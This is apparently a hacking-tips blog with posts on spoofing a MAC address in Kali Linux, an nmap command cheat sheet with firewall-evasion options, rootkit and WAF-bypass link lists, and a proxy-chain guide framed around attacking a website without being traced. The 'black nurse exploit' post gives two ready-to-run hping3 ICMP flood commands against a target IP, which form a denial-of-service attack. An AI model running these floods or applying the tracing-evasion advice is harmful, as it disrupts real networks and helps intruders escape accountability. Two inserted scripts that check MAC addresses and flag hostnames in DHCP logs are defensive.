Wednesday, December 7, 2016

Step by step how to change MAC address in Kali Linux

Step by step How to Change MAC Address on Kali Linux:

1. Open your terminal and type ifconfig | grep HWaddr
You will see your original MAC address; mine was 08:00:27:b2:4d:4b

2. To change the MAC address temporarily, first turn off the network interface by running this command: ifconfig eth0 down

3. After that, set the new MAC address: ifconfig eth0 hw ether 00:00:00:00:00:02
You can change the MAC address to any value in the hexadecimal format XX:XX:XX:XX:XX:XX

4. Now turn the network interface on again: ifconfig eth0 up

5. Finally, check the MAC address again to confirm whether it changed. If we stop at this step, the MAC address goes back to its default after we restart the machine. The following steps show how to change the MAC address permanently.

6. Kali Linux is based on Debian. In Debian, all network interfaces are configured in /etc/network/interfaces.

7. We will edit /etc/network/interfaces. In this tutorial I use the pico text editor, but you can use any text editor you like: pico /etc/network/interfaces

8. Now add one line to change the MAC address permanently: pre-up ifconfig eth0 hw ether 00:00:00:00:00:02
This line is run on system startup.

9. To restore the default MAC address, just add the # sign in front of the line from step 8.

#pre-up ifconfig eth0 hw ether 00:00:00:00:00:02
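
A pre-flight check for the address used in steps 3 and 8, as an added example that is not part of the original post: Linux Ethernet drivers normally refuse an all-zero or multicast address (first octet odd), so a value in XX:XX:XX:XX:XX:XX form can still be rejected. The function names mac_class and mac_plan are made up for this example, and mac_plan only prints the page's commands without running them.

```shell
#!/bin/sh
# Added example; mac_class and mac_plan are illustrative names.

# mac_class ADDR: print invalid | zero | multicast | local | global.
# Returns 0 only for addresses an Ethernet interface will accept.
mac_class() {
    m=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    case $m in
        *[!0-9a-f:]*) echo invalid; return 1 ;;   # stray characters, newlines
    esac
    # Exactly six two-digit hex octets: XX:XX:XX:XX:XX:XX
    if ! printf '%s\n' "$m" | grep -Eq '^([0-9a-f]{2}:){5}[0-9a-f]{2}$'; then
        echo invalid; return 1
    fi
    if [ "$m" = "00:00:00:00:00:00" ]; then
        echo zero; return 1
    fi
    first=$((0x${m%%:*}))
    # Bit 0 of the first octet marks a multicast/broadcast address.
    if [ $((first & 1)) -ne 0 ]; then
        echo multicast; return 1
    fi
    # Bit 1 marks a locally administered address (no vendor OUI).
    if [ $((first & 2)) -ne 0 ]; then echo local; else echo global; fi
}

# mac_plan IFACE ADDR: print (not run) steps 2-4 from the page.
mac_plan() {
    iface=$1 addr=$2
    class=$(mac_class "$addr") || { echo "refusing $addr ($class)" >&2; return 1; }
    printf 'ifconfig %s down\n' "$iface"
    printf 'ifconfig %s hw ether %s\n' "$iface" "$addr"
    printf 'ifconfig %s up\n' "$iface"
}

# The page's own values:
mac_class 08:00:27:b2:4d:4b      # original address from step 1
mac_plan eth0 00:00:00:00:00:02  # new address from step 3
```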

Monday, December 5, 2016

Simple black nurse exploit


hping3 -1 -C 3 -K 3 -i u20 <target ip>
hping3 -1 -C 3 -K 3 --flood <target ip>

Rootkit tutorial

Get your hands dirty with Rootkits

https://github.com/mempodippy/vlany
http://www.ussrback.com/UNIX/penetration/rootkits/
https://github.com/Alifcccccc/Windows-Rootkits
https://packetstormsecurity.com/files/125240/Azazel-Userland-Rootkit.html
https://github.com/islamTaha12/Python-Rootkit
https://github.com/Eterna1/puszek-rootkit
https://github.com/juxing/AdoreForAndroid
https://github.com/HackerFantastic/Public/tree/master/rootkits
https://github.com/m0nad/Diamorphine
https://github.com/maK-/maK_it-Linux-Rootkit
https://github.com/RagingGrim/Rootkit/tree/master/Rootkit
https://github.com/NexusBots/Umbreon-Rootkit
https://github.com/josephjkong/designing-bsd-rootkits
https://github.com/citypw/suterusu/ --> https://citypw.blogspot.gr/2014/08/an-awesome-linux-kernel-rootkit-suterusu.html
https://github.com/Cr4sh/WindowsRegistryRootkit
https://packetstormsecurity.com/files/139665/Vlany-Linux-LD_PRELOAD-Rootkit.html
https://github.com/JReFrameworker/JReFrameworker
https://packetstormsecurity.com/files/128945/Xingyiquan-Linux-2.6.x-3.x-Rootkit.html
https://packetstormsecurity.com/files/118317/Linux-2.6-Kernel-proc-Rootkit-Backdoor.html
https://packetstormsecurity.com/files/108286/KBeast-Kernel-Beast-Linux-Rootkit-2012.html
https://packetstormsecurity.com/files/110942/Jynx-Kit-Release-2.html
https://packetstormsecurity.com/files/25071/_root_040.zip.html
https://github.com/bones-codes/the_colonel
https://github.com/x0r1/jellyfish
https://github.com/ecume/simple-rootkit
https://github.com/Nervous/GreenKit-Rootkit
https://github.com/cloudsec/brootkit
https://github.com/unix-thrust/beurk
https://github.com/NextSecurity/Gozi-MBR-rootkit
https://github.com/rbertin/basic-rootkit
https://github.com/miagilepner/porny
https://turbochaos.blogspot.gr/2013/09/linux-rootkits-101-1-of-3.html
https://github.com/r00tkillah/HORSEPILL
https://github.com/matteomattia/moo_rootkit
https://github.com/ivyl/rootkit
https://github.com/enzolovesbacon/inficere
https://github.com/hiteshd/Android-Rootkit
https://github.com/QuokkaLight/rkduck
https://github.com/0xroot/whitesnow
https://github.com/falk3n/subversive
https://github.com/nnewson/km/tree/master/src
https://github.com/Cr4sh/DrvHide-PoC
https://github.com/Christian-Roggia/open-myrtus/tree/master/rootkit
https://github.com/PoppySeedPlehzr/rookit_playground/tree/master/rootkits
https://github.com/a7vinx/liinux
https://github.com/osiris123/CDriver_Loader
https://github.com/varshapaidi/Kernel_Rootkit
https://github.com/karol-gruszczyk/win-rootkit
https://github.com/hanj4096/wukong
https://github.com/uzyszkodnik/rootkit
https://github.com/kacheo/KernelRootkit
https://github.com/rvillordo/libpreload
https://github.com/soad003/rootkit
https://github.com/NinnOgTonic/Out-of-Sight-Out-of-Mind-Rootkit
https://github.com/HeapLock/THOR
https://github.com/ring-1/zendar
https://github.com/amanone/amark
https://github.com/majdi/deadlands
https://github.com/cccssw/JynKbeast
https://github.com/joshimhoff/toykit
https://github.com/pasv/Z34107
https://github.com/maK-/Keylogger-lkm
https://github.com/Aearnus/syscall-rootkit
https://github.com/schischi/slrk
https://github.com/bhassani/Alina/tree/master/Rootkit
https://github.com/jiayy/lkm-rootkit
https://github.com/ChristianPapathanasiou/apache-rootkit
https://github.com/ChristianPapathanasiou/DEFCON-18-Android-rootkit-Mindtrick
https://github.com/elfmaster/kprobe_rootkit
https://github.com/ah450/rootkit
https://github.com/Jyang772/HideProcessHookMDL
https://github.com/Aarons100/Rootkits-Playground
https://github.com/dluengo/yarr
https://github.com/NotALaser/trk

Fake email sender website


Solve cyber crime case

Q.
I live in city A, and city B is 100 km from here. I changed the MAC address of my laptop and took it with me to city B. I hacked a Wi-Fi network to use the internet and hacked a website with it. I came back to my city A and changed my MAC address again. So... is there any way to track me? Or am I "100% anonymous"?

Ans:

Time travel of package
IP address
MAC address
Fingerprinting
ETag ID
Unique browser ID
User agent
Hostname (user-pc:hacker)
Referrer, X-Forwarded-For IP address
Cookies and Flash cookies.
Ips logs
Using service logs
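
Why a changed MAC address alone does not break the trail, shown on the MAC address and hostname items of the list above (an added example, not part of the original post): a DHCP server logs the hostname a client announces next to its MAC, so the same laptop reappears under the new address. The log lines are constructed in dnsmasq's DHCPACK format, and the function names are made up for this example.

```shell
#!/bin/sh
# Added example: flag hostnames that obtained leases under more than one MAC.
# Sample log lines are constructed (dnsmasq-style DHCPACK entries).

sample_log() {
cat <<'EOF'
Dec  7 10:01:02 gw dnsmasq-dhcp[512]: DHCPACK(wlan0) 192.168.1.23 08:00:27:b2:4d:4b user-pc
Dec  7 10:03:40 gw dnsmasq-dhcp[512]: DHCPACK(wlan0) 192.168.1.31 3c:5a:b4:11:22:33 android-7f
Dec  7 10:15:09 gw dnsmasq-dhcp[512]: DHCPREQUEST(wlan0) 192.168.1.44 00:00:00:00:00:02
Dec  7 10:15:09 gw dnsmasq-dhcp[512]: DHCPACK(wlan0) 192.168.1.44 00:00:00:00:00:02 user-pc
Dec  7 11:03:41 gw dnsmasq-dhcp[512]: DHCPACK(wlan0) 192.168.1.31 3c:5a:b4:11:22:33 android-7f
EOF
}

# Reads syslog lines on stdin; prints "hostname: mac1 mac2 ..." for every
# hostname acknowledged with two or more distinct MAC addresses.
hosts_with_multiple_macs() {
    awk '
        $6 ~ /^DHCPACK\(/ && NF >= 9 {
            host = $9; mac = tolower($8)
            if (!((host, mac) in seen)) {
                seen[host, mac] = 1
                count[host]++
                macs[host] = macs[host] " " mac
            }
        }
        END {
            for (h in count)
                if (count[h] > 1) print h ":" macs[h]
        }' | sort
}

sample_log | hosts_with_multiple_macs
```

Default hostnames repeat across unrelated devices, so a match is a lead to check against the other items in the list, not proof on its own.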

Proxy server and proxy chain

Topic: Proxy Chains
So I think every Ultimate knows about proxy servers.
Basically, we connect to a website like this:
Our PC>>>>Website
This means we are in direct contact with the website, and the website can trace us easily.
They know who downloaded data from their website.

Now, by using a proxy, we connect to the website like this:
Our PC>>>>Proxy Server>>>>Website
So we are not in direct contact with the website.
Proxies may keep records of who used their servers as a proxy.
Some proxies are honeypots, which means governments or bad guys use them to steal our information.

So now let's talk about proxy chains.
When we use multiple proxies simultaneously, it's called a proxy chain.
With a proxy chain we connect to the website like this:
Our PC>>>Proxy server 1>>Proxy2>>Proxy3>>Proxy4>>Website

For example, if we attacked a website through proxy chains,
then here is how the site admin will try to track us.

Website: Listen proxy4, You are Hacker and I know it, you are going to jail.
Proxy4: No, I am just a proxy server man.
Website: Oh sorry, Can you tell me who used your service?
P4: Let me check in my records...Ummm Proxy3 used my service.
He is the Hacker.
*Admin somehow manages to contact the admin of server*
Admin: So you think you can fool me with your proxy? LOL
Proxy3: No I am not a hacker, I am just a Proxy Server.
Proxy2 used my service
Admin: Really? Oh ok

*Admin is frustrated and contacts Proxy2*
Proxy2: I am also a proxy server. I transferred the data to Proxy1.
*Admin contacts Proxy1*
Proxy1: I am also a proxy server, but I can't tell you who used my service.
Admin: Why?
Proxy1: Because someone hacked into my server and deleted my logs.
Admin: Oh shit! But there must be a way to find him too. Like I reached you.
Proxy1: And what if he is using another proxy chain?
*both cry in corner*

Ok, sorry for that twisted climax 😁
Now you should know these things before getting excited:
1) Proxy chaining is far more secure than using just one proxy. It can hide your IP well.
2) It decreases the speed of your tasks, as the data has to travel a long path.
3) I already mentioned the honeypot part.
4) Proxy chains should be used with a VPN for 'significant' anonymity, and that's highly recommended.

Monday, November 28, 2016

How to install Linux Debian OS on an Android mobile without rooting

Steps:
1. Install the GNURoot Debian app from the Play Store (size = 60 MB).
2. Click the install/reinstall button. It will take 15 min.
3. Go to the Launch tab and select the Launch button.

Friday, November 18, 2016

Open source intelligence gathering tools and techniques


Nmap tutorial and commands

Nmap Tool All Commands Collection
****************************************
Basic Scanning Techniques

Scan a single target --> nmap [target]

Scan multiple targets --> nmap [target1] [target2] [etc]

Scan a list of targets --> nmap -iL [list.txt]

Scan a range of hosts --> nmap [range of IP addresses]

Scan an entire subnet --> nmap [IP address/cidr]

Scan random hosts --> nmap -iR [number]

Excluding targets from a scan --> nmap [targets] --exclude [targets]

Excluding targets using a list --> nmap [targets] --excludefile [list.txt]

Perform an aggressive scan --> nmap -A [target]

Scan an IPv6 target --> nmap -6 [target]

Discovery Options

Perform a ping scan only --> nmap -sP [target]

Don't ping --> nmap -PN [target]

TCP SYN ping --> nmap -PS [target]

TCP ACK ping --> nmap -PA [target]

UDP ping --> nmap -PU [target]

SCTP Init ping --> nmap -PY [target]

ICMP echo ping --> nmap -PE [target]

ICMP timestamp ping --> nmap -PP [target]

ICMP address mask ping --> nmap -PM [target]

IP protocol ping --> nmap -PO [target]

ARP ping --> nmap -PR [target]

Traceroute --> nmap --traceroute [target]

Force reverse DNS resolution --> nmap -R [target]

Disable reverse DNS resolution --> nmap -n [target]

Alternative DNS lookup --> nmap --system-dns [target]

Manually specify DNS servers --> nmap --dns-servers [servers] [target]

Create a host list --> nmap -sL [targets]

Advanced Scanning Options

TCP SYN scan --> nmap -sS [target]

TCP connect scan --> nmap -sT [target]

UDP scan --> nmap -sU [target]

TCP Null scan --> nmap -sN [target]

TCP FIN scan --> nmap -sF [target]

Xmas scan --> nmap -sX [target]

TCP ACK scan --> nmap -sA [target]

Custom TCP scan --> nmap --scanflags [flags] [target]

IP protocol scan --> nmap -sO [target]

Send raw Ethernet packets --> nmap --send-eth [target]

Send IP packets --> nmap --send-ip [target]

Port Scanning Options

Perform a fast scan --> nmap -F [target]

Scan specific ports --> nmap -p [ports] [target]

Scan ports by name --> nmap -p [port name] [target]

Scan ports by protocol --> nmap -sU -sT -p U:[ports],T:[ports] [target]

Scan all ports --> nmap -p "*" [target]

Scan top ports --> nmap --top-ports [number] [target]

Perform a sequential port scan --> nmap -r [target]

Version Detection

Operating system detection --> nmap -O [target]

Submit TCP/IP fingerprints --> http://www.nmap.org/submit/

Attempt to guess an unknown OS --> nmap -O --osscan-guess [target]

Service version detection --> nmap -sV [target]

Troubleshooting version scans --> nmap -sV --version-trace [target]

Perform an RPC scan --> nmap -sR [target]

Timing Options

Timing templates --> nmap -T [0-5] [target]

Set the packet TTL --> nmap --ttl [value] [target]

Minimum of parallel connections --> nmap --min-parallelism [number] [target]

Maximum of parallel connections --> nmap --max-parallelism [number] [target]

Minimum host group size --> nmap --min-hostgroup [number] [targets]

Maximum host group size --> nmap --max-hostgroup [number] [targets]

Initial RTT timeout --> nmap --initial-rtt-timeout [time] [target]

Maximum RTT timeout --> nmap --max-rtt-timeout [time] [target]

Maximum retries --> nmap --max-retries [number] [target]

Host timeout --> nmap --host-timeout [time] [target]

Minimum scan delay --> nmap --scan-delay [time] [target]

Maximum scan delay --> nmap --max-scan-delay [time] [target]

Minimum packet rate --> nmap --min-rate [number] [target]

Maximum packet rate --> nmap --max-rate [number] [target]

Defeat reset rate limits --> nmap --defeat-rst-ratelimit [target]

Firewall Evasion Techniques

Fragment packets --> nmap -f [target]

Specify a specific MTU --> nmap --mtu [MTU] [target]

Use a decoy --> nmap -D RND:[number] [target]

Idle zombie scan --> nmap -sI [zombie] [target]

Manually specify a source port --> nmap --source-port [port] [target]

Append random data --> nmap --data-length [size] [target]

Randomize target scan order --> nmap --randomize-hosts [target]

Spoof MAC address --> nmap --spoof-mac [MAC|0|vendor] [target]

Send bad checksums --> nmap --badsum [target]

Output Options

Save output to a text file --> nmap -oN [scan.txt] [target]

Save output to an XML file --> nmap -oX [scan.xml] [target]

Grepable output --> nmap -oG [scan.txt] [target]

Output all supported file types --> nmap -oA [path/filename] [target]

Periodically display statistics --> nmap --stats-every [time] [target]

133t output --> nmap -oS [scan.txt] [target]

Troubleshooting and debugging

Help --> nmap -h

Display Nmap version --> nmap -V

Verbose output --> nmap -v [target]

Debugging --> nmap -d [target]

Display port state reason --> nmap --reason [target]

Only display open ports --> nmap --open [target]

Trace packets --> nmap --packet-trace [target]

Display host networking --> nmap --iflist

Specify a network interface --> nmap -e [interface] [target]

Nmap Scripting Engine

Execute individual scripts --> nmap --script [script.nse] [target]

Execute multiple scripts --> nmap --script [expression] [target]

Script categories --> all, auth, default, discovery, external, intrusive, malware, safe, vuln

Execute scripts by category --> nmap --script [category] [target]

Execute multiple script categories --> nmap --script [category1,category2,etc]

Troubleshoot scripts --> nmap --script [script] --script-trace [target]

Update the script database --> nmap --script-updatedb

Ndiff

Comparison using Ndiff --> ndiff [scan1.xml] [scan2.xml]

Ndiff verbose mode --> ndiff -v [scan1.xml] [scan2.xml]

XML output mode --> ndiff --xml [scan1.xml] [scan2.xml]

Burp Suite download


WAF bypass


http://wafbypass.me/w/index.php/Main_Page 
http://www.freebuf.com/articles/web/10099.html  
http://tech-technical.com/index.php/2015/11/11/waf-bypass-sql-injection-tutorial/
http://webvuln.blogspot.hk/2015_04_01_archive.html
http://www.wooyun.org/bugs/wooyun-2014-089426
https://forum.90sec.org/forum.php?mod=viewthread&tid=9133 
http://www.idiot-attacker.com/2016/02/macam-macam-kode-bypass-waf.html
http://wooyun.org/bugs/wooyun-2010-0121291
http://wooyun.org/bugs/wooyun-2010-0115175
http://drops.wooyun.org/tips/7883
http://www.securityidiots.com/Web-Pentest/WAF-Bypass/
http://www.pentest.net.cn/post/7
http://www.mottoin.com/86886.html
http://mp.weixin.qq.com/s?__biz=MzIyNjQzMjcyNw==&mid=2247483860&idx=1&sn=fa19f02e29d25f5f6852af27451ae4a9&scene=23&srcid=0815JYA53l0Bk3PMkhzRlKUh#rd
https://github.com/borbelyau/bypass-waf-ids-ips/blob/master/evasionsqli_methods

Tuesday, November 15, 2016